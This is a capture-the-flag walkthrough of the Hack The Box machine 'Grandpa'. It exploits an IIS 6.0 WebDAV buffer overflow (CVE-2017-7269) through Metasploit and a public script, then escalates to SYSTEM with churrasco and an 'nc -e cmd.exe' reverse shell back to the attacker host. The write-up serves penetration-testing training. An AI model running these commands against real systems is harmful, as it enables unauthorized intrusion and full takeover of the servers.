Grandpa

Reconnaissance:

http://10.10.10.14/ - Web frameworks: Microsoft ASP.NET - Web servers: IIS 6.0 - Operating systems: Windows Server

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.14 

80/tcp open  http    Microsoft IIS httpd 6.0
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Sat, 16 Dec 2023 02:45:28 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_http-title: Under Construction
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0


┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.14   

All 1000 scanned ports on 10.10.10.14 are in ignored states.

nmap found only HTTP listening on TCP 80

Gobuster:

┌──(kali💀kali)-[~]
└─$ gobuster dir -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.14/

Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 149] [--> http://10.10.10.14/images/]
/Images               (Status: 301) [Size: 149] [--> http://10.10.10.14/Images/]
/IMAGES               (Status: 301) [Size: 149] [--> http://10.10.10.14/IMAGES/]

Unfortunately, I can’t find anything in /images and it doesn’t list contents, and I just get a 403 from /_private.

Nikto:

┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.14:80

+ /: Retrieved x-powered-by header: ASP.NET.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: WebDAV enabled (PROPPATCH UNLOCK LOCK PROPFIND MKCOL COPY SEARCH listed as allowed).

WebDAV:

┌──(kali💀kali)-[~]
└─$ davtest --url http://10.10.10.14/
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.14
********************************************************
NOTE    Random string for this session: PNkA0RdNh4VDSDi
********************************************************
 Creating directory
MKCOL           FAIL
********************************************************
 Sending test files
PUT     cfm     FAIL
PUT     pl      FAIL
PUT     jsp     FAIL
PUT     txt     FAIL
PUT     asp     FAIL
PUT     php     FAIL
PUT     jhtml   FAIL
PUT     html    FAIL
PUT     aspx    FAIL
PUT     shtml   FAIL
PUT     cgi     FAIL

This reminds me a lot of Granny, and given all the WebDAV in the nmap output, I randavtest. Unlike in Granny, nothing is enabled:

Vulnerabilities:

Since IIS 6.0 is so old, I decided to look for vulnerabilities, and found some:

┌──(kali💀kali)-[~]
└─$ searchsploit iis 6.0

 Exploit Title                                              |  Path
------------------------------------------------------------ ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Ne | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote St | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial  | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Servic | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (De | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Bu | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass     | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Pa | windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities    | windows/remote/19033.txt

Microsoft IIS 6.0 is vulnerable to a remote buffer overflow.

Note: Several people I know have tried to solve this box without using Metasploit and have failed to because the shell you get back is too unstable. Therefore, I’ll be solving this box using Metasploit.

Foothold: Metasploit

Start up Metasploit.

┌──(kali💀kali)-[~]
└─$ msfconsole

Viewing the exploit on exploitdb we get a CVE #2017-7269. Let’s see if Metasploit has an exploit for it.

Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer OverflowExploit Database

msf6 > search 2017-7269

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

It does. Let’s switch to that exploit and configure the RHOST to the Grandpa IP address.

msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.2
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

It appears the shell we are in however is a bit wonky:

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

If we run ps in Meterpreter, we can find list out running processes.

meterpreter > ps

2736  1496  w3wp.exe        x86   0        NT AUTHORITY\NETWORK SER  c:\windows\system32\inet

Process 1736 seems especially interesting because it is running as NT AUTHORITY\NETWORK SERVICE. We can migrate to that process using the migrate command:

meterpreter > migrate 2736

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

Cool. Now we’ll need to focus on escalating our privileges to get the flags:

meterpreter > cd 'C:\Documents and Settings'
meterpreter > cd 'C:Harry'

Lets go ahead and background this session and import the local_exploit_suggester module to check for privilege escalation vectors for us:

meterpreter > background
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.                                                
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                               
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.                                                               
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                               
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.                                                
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                               
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

Nice, the module found quite a few possible vectors.

I’m most interested in trying exploit/windows/local/ms14_070_tcpip_ioctl.

I can search for and use this module and then set the session as well as my lhost IP address:

msf6 post(multi/recon/local_exploit_suggester) > search exploit/windows/local/ms14_070_tcpip_ioctl
msf6 post(multi/recon/local_exploit_suggester) > use 0
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST 10.10.14.2
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions -i 1

Foothold: Shell

GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269GitHub

iis6-exploit-2017-CVE-2017-7269/iis6 reverse shell at master · g0rx/iis6-exploit-2017-CVE-2017-7269GitHub

At my listener:

┌──(kali💀kali)-[~]
└─$ rlwrap nc -lnvp 443

I eventually found this script. I didn’t have to update it at all, and running it gave a shell:

┌──(kali💀kali)-[~/Desktop]
└─$ python iis_rev_shell.py 10.10.10.14 80 10.10.14.2 443

Sometimes this script too would fail, if the box wasn’t in a clean start. When doing buffer overflow exploits, it’s a good idea to start from a clean state if possible (ie reset the box).

Interestingly, I didn’t have access to user.txt at this point. There was one user, Harry:

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

C:\>cd Documents and Settings
C:\Documents and Settings>dir

C:\Documents and Settings>cd Harry
cd Harry
Access is denied.

Privilege Escalation

To run any exploits, I’ll need a place I can write on Grandpa. Many of my go-tos failed In the system root, there’s an unusual directory, wmpub:

C:\>cd wmpub
C:\wmpub>echo test > test.txt
C:\wmpub>dir
C:\wmpub>type test.txt
type test.txt
test

icacles shows that as well:

C:\>icacls wmpub

That Userss can WD decodes to write data/add files.

systeminfo:

While you don’t see it in newer HTB, for these original hosts, kernel exploits were often the intended path, and it’s definitely something that will come up in OSCP. To check, I’ll start with a systeminfo:

C:\wmpub>systeminfo

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 2 Hours, 4 Minutes, 47 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2293 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 751 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,288 MB
Page File: In Use:         182 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

I can then drop that into a file and use Windows Exploit Suggester to see what exploits might work.

First, update:

┌──(kali💀kali)-[/opt]
└─$ cd Windows-Exploit-Suggester

┌──(kali💀kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo ./windows-exploit-suggester.py --update

Now pass it the new database and the systeminfo output:

┌──(kali💀kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo ./windows-exploit-suggester.py --database 2023-12-16-mssb.xls --systeminfo /home/kali/Desktop/sysinfo.txt

Going from this list to a shell is often a lot of googling, guessing, and trial and error. I’ll reduce the list with the following criteria:

Not interested in Metasploit.
Looking (at least to start) for exploits against Windows itself, not IE or MsSQL.
I like to start with ones that I can find a pre-compiled exe. That’s not a great idea for real work, but easiest for HTB / OSCP.
The exe has to create a new process that calls back or can return a shell in the same window. You’ll find a lot of these have exes that open a new shell as SYSTEM, which isn’t useful at all for me.

No Success I tried a lot off this list, but none with success. This is normal for this kind of thing. It’s frustrating, and normal. One tip I’d throw out for anyone doing OSCP - keep a list of exploits that have binaries that fit the descriptions above and where they work. I used to have one, but can’t find it anymore. Something like this is a really good start.

I went back to enumerating, and checked privs:

C:\>whoami /priv

Privilege Name                Description                               State   
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled

SEImpersonalPrivilege is one I know to look out for. For modern boxes, that means a potato exploit (juicy, lonely, rotten). But for 2003, it’s better to start with churrasco.

churrasco:

I grabbed the binary from the Churrasco GitHub. I ran smbserver.py share . on my local machine to open an SMB share named share with both nc.exe and churrasco.exe in that directory:

GitHub - Re4son/Churrasco: Changes for Visual Studio 2013GitHub

┌──(kali💀kali)-[~/Desktop]
└─$ smbserver.py share .

C:\wmpub>copy \\10.10.14.2\share\nc.exe .

C:\wmpub>copy \\10.10.14.2\share\churrasco.exe 

Now run it, having it run nc to connect back to me:

┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap nc -lnvp 443

C:\wmpub>.\churrasco.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.2 443"

┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.14] 1045
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\TEMP>whoami
whoami
nt authority\system

PreviousArtic NextSilo

Last updated 2 years ago